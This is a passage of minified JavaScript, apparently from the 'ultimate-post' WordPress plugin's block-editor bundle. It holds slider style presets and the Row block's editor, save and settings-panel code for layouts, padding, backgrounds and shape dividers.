{openColor:1,type:"color",color:"rgba(222,197,93,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(222,197,93,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catSacing:{lg:{top:0,bottom:"5",left:0,right:0,unit:"px"}},catPadding:{lg:{top:"4",bottom:"4",left:"8",right:"8",unit:"px"}},metaList:'["metaDate"]',metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},weight:"400",decoration:"none",family:""},metaColor:"rgba(40,74,0,1)",metaHoverColor:"rgba(40,74,0,.5)",metaMargin:{lg:{top:"15",bottom:"",left:"",right:"",unit:"px"}},metaPadding:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},slide6:{autoPlay:!0,dots:!1,fade:!1,imgOverlay:!1,excerptShow:!1,readMore:!1,layout:"slide6",height:{lg:480,unit:"px",ulg:"px"},contentVerticalPosition:"middlePosition",contentHorizontalPosition:"rightPosition",contentAlign:"left",contenWraptWidth:{lg:"482",sm:"70",unit:"%",ulg:"px",uxs:"%",xs:"90",usm:"%"},contenWraptHeight:{lg:"288",ulg:"px",uxs:"px",xs:"250",usm:"%",sm:""},contentWrapBg:"rgba(255,255,255,1)",contentWrapHoverBg:"rgba(255,255,255,1)",contentWrapBorder:{width:{top:1,right:1,bottom:1,left:1},type:"solid",color:"rgba(112,112,112,1)",openBorder:0},contentWrapRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapPadding:{lg:{top:"35",bottom:"0",left:"35",right:"35",unit:"px"},xs:{top:"16",right:"16",bottom:"16",left:"16",unit:"px"}},contentWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#707070",openBorder:1},slideWrapMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},titleColor:"rgba(60,60,60,1)",titleHoverColor:"rgba(151,148,148,1)",titleTypo:{openTypography:1,size:{lg:"26",xs:"20",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"500",transform:""},titlePadding:{lg:{top:"20",bottom:"12",unit:"px",right:"0",left:"0"}},titleLength:"10",arrowSize:{lg:"25",unit:"px",ulg:"px"},arrowWidth:{lg:"52",unit:"px",ulg:"px"},arrowHeight:{lg:"52",unit:"px",ulg:"px"},arrowPos:"right",arrowVartical:{lg:"358",unit:"px",ulg:"px",uxs:"px",xs:"55"},prevArrowPos:{lg:"429",unit:"px",xs:"53",xs:""},nextArrowPos:{lg:"377",unit:"px",xs:"0",xs:""},arrowColor:"rgba(255,255,255,1)",arrowHoverColor:"",arrowBg:"#9f9f9f",arrowHoverBg:"#848484",arrowRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},arrowHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},catColor:"rgba(121,175,167,1)",catHoverColor:"rgba(121,176,168,0.5)",catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"capitalize",weight:"300",decoration:"none",family:""},catBgColor:{openColor:0,type:"openColor",color:"",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:0,type:"openColor",color:"#037fff",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catPadding:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},imgHeight:{lg:"100",ulg:"%",xs:"200",ulg:"%",uxs:"px"},imgWidth:{lg:"70",ulg:"%",uxs:"%",xs:"100"},metaStyle:"style3",metaSeparator:"dot",metaColor:"rgba(112,112,112,1)",metaHoverColor:"rgba(1,1,1,1)",metaSpacing:{lg:"12",unit:"px",ulg:"px"},metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},weight:"400",decoration:"none",family:""},wrapBg:{openColor:0,type:"color",color:"rgba(237,237,237,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},wrapOuterPadding:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},slide7:{autoPlay:!0,fade:!1,dots:!1,excerptShow:!1,sliderGap:"0",layout:"slide7",slideBgBlur:0,llItemScale:{lg:"0.93"},centerItemScale:{lg:"0.99"},height:{lg:"439",unit:"px"},slidesCenterPadding:{lg:"213",sm:"100",xs:"0",unit:"px"},contentWrapBg:"",contentWrapHoverBg:"",contentVerticalPosition:"middlePosition",contenWraptWidth:{lg:"",unit:"%",ulg:"%"},contentWrapPadding:{lg:{top:"",bottom:"",left:"24",right:"24",unit:"px"}},contentWrapRadius:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},contentWrapHoverRadius:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},slideWrapMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},titleColor:"rgba(255,255,255,1)",titleHoverColor:"rgba(202,202,202,1)",titleTypo:{openTypography:1,size:{lg:"24",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"700",transform:"capitalize"},titlePadding:{lg:{top:"10",bottom:"10",unit:"px",right:"20",left:"20"}},arrowSize:{lg:"22",unit:"px",ulg:"px"},arrowWidth:{lg:"49",unit:"px",ulg:"px"},arrowHeight:{lg:"49",unit:"px",ulg:"px"},arrowVartical:{lg:"229",unit:"px"},arrowBg:"rgba(255,255,255,1)",arrowHoverBg:"rgba(255,255,255,1)",arrowRadius:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},arrowHoverRadius:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},arrowShadow:{inset:"",width:{top:"5",right:"6",bottom:"31",left:"0",unit:"px"},color:"rgba(0,0,0,0.32)",openShadow:1},catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"3.6",unit:"px"},transform:"uppercase",weight:"500",decoration:"none",family:""},prevArrowPos:{lg:"200",sm:"80",xs:"0",unit:"px"},nextArrowPos:{lg:"200",sm:"80",xs:"0",unit:"px"},catColor:"rgba(255,255,255,1)",catHoverColor:"rgba(255,255,255, .5)",catHoverColor:"rgba(207,207,207,1)",catBgColor:{openColor:0,type:"openColor",color:"#000",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:0,type:"openColor",color:"#037fff",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},imgOverlay:!0,imgOverlayType:"custom",overlayColor:{openColor:1,type:"gradient",color:"#0e1523",gradient:"linear-gradient(359deg,rgb(0,0,0) 34%,rgba(30,30,30,0.64) 99%)",clip:!1},imgOpacity:"0.55",imgGrayScale:{lg:"0",unit:"%",ulg:"%"},imgRadius:{lg:{top:"24",right:"24",bottom:"24",left:"24",unit:"px"},unit:"px"},metaList:'["metaAuthor","metaView"]',metaStyle:"icon",metaSeparator:"dash",metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"20",unit:"px"},weight:"400",decoration:"none",family:""},metaColor:"rgba(255,255,255,1)",metaSpacing:{lg:"15",unit:"px",ulg:"px"},metaMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}}},slide8:{autoPlay:!0,slideBgBlur:4,layout:"slide8",excerptShow:!1,readMore:!1,imgOverlay:!1,contentWrapBg:"#00000059",contentWrapHoverBg:"#00000059",contentAlign:"left",contentWrapRadius:{lg:"0"},contentWrapHoverRadius:{lg:"0"},contentHorizontalPosition:"leftPosition",contenWraptHeight:{lg:335,ulg:"px",usm:"%"},contenWraptWidth:{lg:742,unit:"%",ulg:"px",usm:"%",sm:100},contentWrapRadiu:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapPadding:{lg:{top:"67",bottom:"21",left:"67",right:"67",unit:"px"},xs:{top:"30",right:"16",bottom:"16",left:"16",unit:"px"}},slideWrapMargin:{lg:{top:"",bottom:"",left:"165",right:"",unit:"px"},sm:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},titleHoverColor:"rgba(141,141,141,1)",titleTypo:{openTypography:1,size:{lg:"38",xs:"25",unit:"px"},height:{lg:"1.3",xs:"34",ulg:"rem",uxs:"px"},decoration:"none",family:"",weight:"600",transform:"capitalize"},titlePadding:{lg:{top:"10",bottom:"10",unit:"px"}},titleLength:"9",arrowSize:{lg:"21",unit:"px",ulg:"px"},arrowWidth:{lg:"50",unit:"px",ulg:"px"},arrowHeight:{lg:"50",unit:"px",ulg:"px"},arrowVartical:{lg:"190",xs:"190",unit:"px"},prevArrowPos:{lg:"165",unit:"px",sm:"0"},nextArrowPos:{lg:"218",unit:"px",sm:"55"},arrowColor:"rgba(255,255,255,1)",arrowHoverColor:"rgba(255,255,255,1)",arrowBg:"rgba(56,56,56,1)",arrowHoverBg:"rgba(0,0,0,1)",arrowRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},arrowHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotWidth:{lg:"4",unit:"px"},dotHeight:{lg:"4",unit:"px",ulg:"px"},dotHoverWidth:{lg:"8",unit:"px"},dotHoverHeight:{lg:"8",unit:"px",ulg:"px"},dotVartical:{lg:"21",unit:"px",ulg:"px"},dotBg:"rgba(255,255,255,1)",dotHoverBg:"rgba(255,255,255,1)",catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"7.8",unit:"px"},transform:"uppercase",weight:"400",decoration:"none",family:""},catBgColor:{openColor:1,type:"color",color:"rgba(255,255,255,0.29)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(255,255,255,0.29)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catRadius:{lg:{0:"2",top:"0",right:"0",bottom:"0",left:"0",unit:"px"},unit:"px"},catSacing:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},catPadding:{lg:{top:"8",bottom:"8",left:"10",right:"10",unit:"px"}},metaSeparator:"dash",metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"},weight:"300",decoration:"none",family:""},metaColor:"rgba(255,255,255,1)",metaSpacing:{lg:"14",unit:"px",ulg:"px"}}}},66187:(e,t,l)=>{"use strict";l.d(t,{Z:()=>S});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(59902),s=l(92637),p=l(55040),c=l(74661),u=l(20498);const{__}=wp.i18n,{InspectorControls:d,InnerBlocks:m}=wp.blockEditor,{Fragment:g,useEffect:y}=wp.element,{Tooltip:b}=wp.components,{serialize:v,parse:h}=wp.blocks,{getBlocksByClientId:f}=wp.data.select("core/block-editor"),{removeBlocks:k,updateBlockAttributes:w,insertBlocks:x}=wp.data.dispatch("core/block-editor"),{getBlockAttributes:T,getBlockRootClientId:_}=wp.data.select("core/block-editor"),C=[{lg:[100],sm:[100],xs:[100]},{lg:[50,50],sm:[50,50],xs:[100,100]},{lg:[70,30],sm:[50,50],xs:[100,100]},{lg:[30,70],sm:[50,50],xs:[100,100]},{lg:[33.33,33.33,33.34],sm:[33.33,33.33,33.34],xs:[100,100,100]},{lg:[25,25,50],sm:[25,25,50],xs:[100,100,100]},{lg:[50,25,25],sm:[50,25,25],xs:[100,100,100]},{lg:[25,25,25,25],sm:[50,50,50,50],xs:[100,100,100,100]},{lg:[20,20,20,20,20],sm:[20,20,20,20,20],xs:[100,100,100,100,100]},{lg:[16.66,16.66,16.66,16.66,16.66,16.7],sm:[16.66,16.66,16.66,16.66,16.66,16.7],xs:[100,100,100,100,100,100]}],E=[{lg:[100],sm:[100],xs:[100]},{lg:[50,50],sm:[50,50],xs:[100,100]},{lg:[33.33,33.33,33.34],sm:[33.33,33.33,33.34],xs:[100,100,100]},{lg:[25,25,25,25],sm:[50,50,50,50],xs:[100,100,100,100]},{lg:[20,20,20,20,20],sm:[20,20,20,20,20],xs:[100,100,100,100,100]},{lg:[16.66,16.66,16.66,16.66,16.66,16.7],sm:[16.66,16.66,16.66,16.66,16.66,16.7],xs:[100,100,100,100,100,100]}];function S(e){const{isSelected:t,setAttributes:l,name:S,attributes:P,clientId:L,className:I,toggleSelection:B}=e,{blockId:U,currentPostId:M,advanceId:A,HtmlTag:H,rowBtmShape:N,rowTopShape:j,rowBgImg:Z,rowOverlayBgImg:O,layout:R,rowTopGradientColor:D,rowBtmGradientColor:z,rowWrapPadding:F,align:W,previewImg:V}=P;y((()=>{const e=L.substr(0,6),t=T(_(L));(0,i.qi)(l,t,M,L),U?U&&U!=e&&(t?.hasOwnProperty("ref")||(0,i.k0)()||t?.hasOwnProperty("theme")||l({blockId:e})):l({blockId:e})}),[L]);const G={setAttributes:l,name:S,attributes:P,clientId:L},[q]=(0,r.Z)();let $;if(U&&($=(0,n.Kh)(P,"ultimate-post/row",U,(0,i.k0)())),V&&!t)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:V});y((()=>{t&&V&&l({previewImg:""})}),[e?.isSelected]);const K=F[q]?.unit?F[q]?.unit:"px";if(!Object.keys(R).length)return(0,a.createElement)("div",{className:"ultp-column-structure"},(0,a.createElement)("div",{className:"ultp-column-structure__heading"},"Chose a Layout"),(0,a.createElement)("div",{className:"ultp-column-structure__content"},C.map(((e,t)=>(0,a.createElement)(b,{key:t,delay:0,visible:!0,placement:"bottom",text:`${e.lg.join(" : ")}`},(0,a.createElement)("div",{onClick:()=>l({layout:e})},e.lg.map(((e,t)=>(0,a.createElement)("div",{key:t,style:{width:`calc(${e}% - 15px)`}})))))))));const J=Z?.openColor?" ultpBgPadding"+(F?.lg?.left?"":" lgL")+(F?.lg?.right?"":" lgR")+(F?.sm?.left?"":" smL")+(F?.sm?.right?"":" smR")+(F?.xs?.left?"":" xsL")+(F?.xs?.right?"":" xsR"):"",Y=(e,t,o)=>{const a=Object.assign({},F[q],{[o]:e+parseInt(t)});l({rowWrapPadding:Object.assign({},F,{[q]:a})})};return(0,a.createElement)(g,null,(0,a.createElement)(d,null,(0,a.createElement)(s.Sections,null,(0,a.createElement)(s.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,a.createElement)("div",{className:"ultp-field-wrap ultp-field-tag ultp-row-control ultp-label-space"},(0,a.createElement)("label",{className:"ultp-field-label"},__("Row Column","ultimate-post")),(0,a.createElement)("div",{className:"ultp-sub-field"},E.map(((e,t)=>(0,a.createElement)("span",{key:t,className:"ultp-tag-button"+(e.lg.length==R.lg.length?" active":""),onClick:()=>{l({layout:e});const{innerBlocks:t}=f(L)[0]||[];t.length>e.lg.length&&Array(t.length-e.lg.length).fill(1).forEach(((l,o)=>{t[t.length-(o+1)].innerBlocks.forEach(((l,o)=>{const a=v(f(l.clientId));x(h(a),0,t[e.lg.length-1].clientId,!1)})),k(t[t.length-(o+1)].clientId,!1)}));for(let l=0;l<e.lg.length;l++){const o={lg:e.lg[l],sm:e.sm[l],xs:e.xs[l],unit:"%"};if(t.length>=l+1)w(t[l].clientId,{columnWidth:o});else{const e=wp.blocks.createBlock("ultimate-post/column",{columnWidth:o});x(e,l,L,!1)}}}},t+1))))),(0,a.createElement)("br",null),(0,a.createElement)(c.Z,{clientId:L,layout:R,store:G})),(0,a.createElement)(s.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,a.createElement)(i.T,{title:__("General","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}},{position:3,data:{type:"select",key:"contentHeightType",label:__("Height Type","ultimate-post"),options:[{value:"normal",label:__("Normal","ultimate-post")},{value:"windowHeight",label:__("Window Height","ultimate-post")},{value:"custom",label:__("Min Height","ultimate-post")}]}},{position:4,data:{type:"range",key:"contentHeight",min:0,max:1500,step:1,responsive:!0,unit:!0,label:__("Min Height","ultimate-post")}},{position:5,data:{type:"group",key:"contentOverflow",justify:!0,label:__("Overflow","ultimate-post"),options:[{value:"visible",label:__("Visible","ultimate-post")},{value:"hidden",label:__("Hidden","ultimate-post")}]}},{position:6,data:{type:"select",key:"HtmlTag",block:"column",beside:!0,label:__("Html Tag","ultimate-post"),options:[{value:"div",label:__("div","ultimate-post")},{value:"section",label:__("Section","ultimate-post")},{value:"header",label:__("header","ultimate-post")},{value:"footer",label:__("footer","ultimate-post")},{value:"aside",label:__("aside","ultimate-post")},{value:"main",label:__("main","ultimate-post")},{value:"article",label:__("article","ultimate-post")}]}},{position:7,data:{type:"toggle",key:"enableRowLink",label:__("Enable Wrapper Link","ultimate-post")}},{position:8,data:{type:"text",key:"rowWrapperLink",label:__("Wrapper Link","ultimate-post")}},{position:9,data:{type:"toggle",key:"enableNewTab",label:__("Enable Target Blank","ultimate-post")}}],initialOpen:!0,store:G}),(0,a.createElement)(i.Mg,{store:G}),(0,a.createElement)(i.iv,{store:G}))),(0,i.dH)()),(0,a.createElement)(H,(0,o.Z)({},A&&{id:A},{className:`ultp-block-${U} ${I} ${W?`align${W}`:""} ${J}`}),$&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:$}}),(0,a.createElement)("div",{className:"ultp-row-wrapper"},(0,a.createElement)(p.t,{position:"top",setLengthFunc:Y,unit:K,previousLength:parseInt(F[q]?.top?F[q]?.top:0),toggleSelection:B}),Object.keys(Z).length>0&&1==Z.openColor&&"video"==Z.type&&Z.video&&(0,i.$i)(Z.video,Z.loop||0,Z.start||"",Z.end||"",Z.fallback||""),j&&"empty"!=j&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-top"},(0,u.T)(j,U,"top",D)),1==O.openColor&&(0,a.createElement)("div",{className:"ultp-row-overlay"}),N&&"empty"!=N&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-bottom"},(0,u.T)(N,U,"bottom",z)),(0,a.createElement)(m,{renderAppender:!1,template:(e=>e.lg.map(((t,l)=>["ultimate-post/column",{columnWidth:{lg:e.lg[l],sm:e.sm[l],xs:e.xs[l],unit:"%"}}])))(R),allowedBlocks:["ultimate-post/column"]}),(0,a.createElement)(p.t,{position:"bottom",setLengthFunc:Y,unit:K,previousLength:parseInt(F[q]?.bottom?F[q]?.bottom:0),toggleSelection:B}))))}},55040:(e,t,l)=>{"use strict";l.d(t,{t:()=>n});var o=l(67294);const{ResizableBox:a}=wp.components,{useState:i}=wp.element,n=e=>{const{position:t,setLengthFunc:l,unit:n,previousLength:r,toggleSelection:s,minHeight:p,maxHeight:c,minWidth:u,maxWidth:d,currentColumnParentWidth:m,stateHandle:g}=e,[y,b]=i(r),[v,h]=i(!1);return(0,o.createElement)(a,{size:{height:"right"==t?"100%":r+n,width:"right"==t?r+n:"auto"},minHeight:0,minWidth:u?u+n:"0%",maxWidth:d?d+n:"100%",enable:{[t]:!0},onResize:(e,l,o,a)=>{e.preventDefault(),h(!0),b(r+a.height),g&&g(r,"right"==t?a.width:a.height,t),s(!0)},onResizeStop:(e,o,a,i)=>{l(r,"right"==t?i.width:i.height,t),s(!0),h(!1)},onResizeStart:()=>{s(!1)}},y&&["top","bottom"].includes(t)?(0,o.createElement)("div",{className:`ultp-dragable-padding ultp-dragable-padding-${t}`},(0,o.createElement)("span",null,(v?y:r)+n)):"")}},64626:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(87462),a=l(67294),i=l(53049),n=l(20498);const{InnerBlocks:r}=wp.blockEditor;function s(e){const{blockId:t,advanceId:l,HtmlTag:s,rowTopShape:p,rowBtmShape:c,enableRowLink:u,rowWrapperLink:d,enableNewTab:m,rowBgImg:g,rowOverlayBgImg:y,rowTopGradientColor:b,rowBtmGradientColor:v,align:h,rowWrapPadding:f,rowStickyPosition:k}=e.attributes,w=g?.openColor?" ultpBgPadding"+(f?.lg?.left?"":" lgL")+(f?.lg?.right?"":" lgR")+(f?.sm?.left?"":" smL")+(f?.sm?.right?"":" smR")+(f?.xs?.left?"":" xsL")+(f?.xs?.right?"":" xsR"):"";let x="";return["row_sticky","row_scrollToStickyTop"].includes(k)&&(x=` row_sticky_active ${k}`),(0,a.createElement)(s,(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ${h?`align${h}`:""} ${w}${x}`}),(0,a.createElement)("div",{className:"ultp-row-wrapper"},Object.keys(g).length>0&&1==g.openColor&&"video"==g.type&&g.video&&(0,i.$i)(g.video,g.loop||0,g.start||"",g.end||"",g.fallback||""),p&&"empty"!=p&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-top"},(0,n.T)(p,t,"top",b)),1==y.openColor&&(0,a.createElement)("div",{className:"ultp-row-overlay"}),u&&(0,a.createElement)("a",{href:d,target:m&&"_blank",className:"ultp-rowwrap-url"}),c&&"empty"!=c&&(0,a.createElement)("div",{className:"ultp-row-shape ultp-shape-bottom"},(0,n.T)(c,t,"bottom",v)),(0,a.createElement)("div",{className:"ultp-row-content"},(0,a.createElement)(r.Content,null))))}},74661:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(20498);const{__}=wp.i18n,n=({store:e,clientId:t,layout:l})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"rowlayout",block:"column",key:"layout",responsive:!0,clientId:t,layout:l,label:__("Layout","ultimate-post")}},{position:3,data:{type:"range",key:"columnGap",min:0,max:300,step:1,responsive:!0,clientId:t,updateChild:!0,label:__("Column Gap (Custom)","ultimate-post")}},{position:4,data:{type:"range",key:"rowGap",min:0,max:300,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}},{position:5,data:{type:"toggle",key:"inheritThemeWidth",clientId:t,updateChild:!0,label:__("Inherit Theme Width","ultimate-post")}},{position:6,data:{type:"range",key:"rowContentWidth",min:0,max:1700,step:1,responsive:!0,unit:!0,clientId:t,updateChild:!0,label:__("Content Max-Width","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Flex Properties","ultimate-post"),include:[{position:3,data:{type:"toggle",key:"reverseEle",label:__("Reverse","ultimate-post")}},{position:5,data:{type:"alignment",block:"row-column",key:"ColumnAlign",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd","stretch"],options:["flex-start","center","flex-end","stretch"],label:__("Vertical Alignment (Align Items)","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background & Wrapper","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"rowBgImg",image:!0,video:!0,label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"rowWrapHoverImg",image:!0,label:__("Background","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background Overlay","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"rowOverlayBgImg",image:!0,label:__("Color","ultimate-post")},{type:"range",key:"rowOverlayOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"rowOverlayBgFilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"rowOverlayBgBlend",beside:!0,options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"rowOverlaypHoverImg",image:!0,label:__("Color","ultimate-post")},{type:"range",key:"rowOverlayHovOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"rowOverlayHoverFilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"rowOverlayHoverBgBlend",beside:!0,options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Spacing & Border Style","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"rowWrapMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:2,data:{type:"dimension",key:"rowWrapPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"border",key:"rowWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"rowWrapRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"rowWrapShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"border",key:"rowWrapHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"rowWrapHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"rowWrapHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],store:e}),(0,o.createElement)(a.T,{title:__("Shape Divider","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"Top",title:__("Top","ultimate-post"),options:[{type:"select",key:"rowTopShape",label:__("Type","ultimate-post"),svg:!0,options:[{value:"empty",label:__("Empty","ultimate-post")},{value:"tilt",label:__("Tilt","ultimate-post"),svg:(0,i.T)("tilt")},{value:"mountain",label:__("Mountain","ultimate-post"),svg:(0,i.T)("mountain")},{value:"waves",label:__("Waves","ultimate-post"),svg:(0,i.T)("waves")},{value:"curve",label:__("Curve","ultimate-post"),svg:(0,i.T)("curve")},{value:"curve_invert",label:__("Curve Invert","ultimate-post"),svg:(0,i.T)("curve_invert")},{value:"asymmetrical_triangle",label:__("Asymmetrical Tringle","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle")},{value:"asymmetrical_triangle_invert",label:__("Asymmetrical Tringle Invert","ultimate-post"),svg:(0,i.T)("asymmetrical_triangle_invert")},{value:"waves_invert",label:__("Waves Invert","ultimate-post"),svg:(0,i.T)("waves_invert")}]},{type:"color2",key:"rowTopGradientColor",label:__("Color","ultimate-post"),extraClass:"ultp-hide-field-item",customGradient:[{name:"Plum Plate",gradient:"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)",slug:"plum-plate"},{name:"Aqua Splash",gradient:"linear-gradient(15deg, rgb(19, 84, 122) 0%, rgb(128, 208, 199) 100%)",slug:"aqua-splash"},{name:"Teen Party",gradient:"linear-gradient(-225deg, rgb(255, 5, 124) 0%, rgb(141, 11, 147) 50%, rgb(50, 21, 117) 100%)",slug:"teen-party"},{name:"Fabled Sunset",gradient:"linear-gradient(-270deg, rgb(35, 21, 87) 0%, rgb(68, 16, 122) 29%, rgb(255, 19, 97) 67%, rgb(255, 248, 0) 100%)",slug:"fabled-sunset"},{name:"Night Call",gradient:"linear-gradient(-245deg, rgb(172, 50, 228) 0%, rgb(121, 24, 242) 48%, rgb(72, 1, 255) 100%)",slug:"night-call"},{name:"Itmeo Branding",gradient:"linear-gradient(18deg, rgb(42, 245, 152) 0%, rgb(0, 158, 253) 100%)",slug:"itmeo-branding"},{name:"Morning Salad",gradient:"linear-gradient(-255deg, rgb(183, 248, 219) 0%, rgb(80, 167, 194) 100%)",slug:"morning-salad"},{name:"Mind Crawl",gradient:"linear-gradient(-245deg, rgb(71, 59, 123) 0%, rgb(53, 132, 167) 51%, rgb(48, 210, 190) 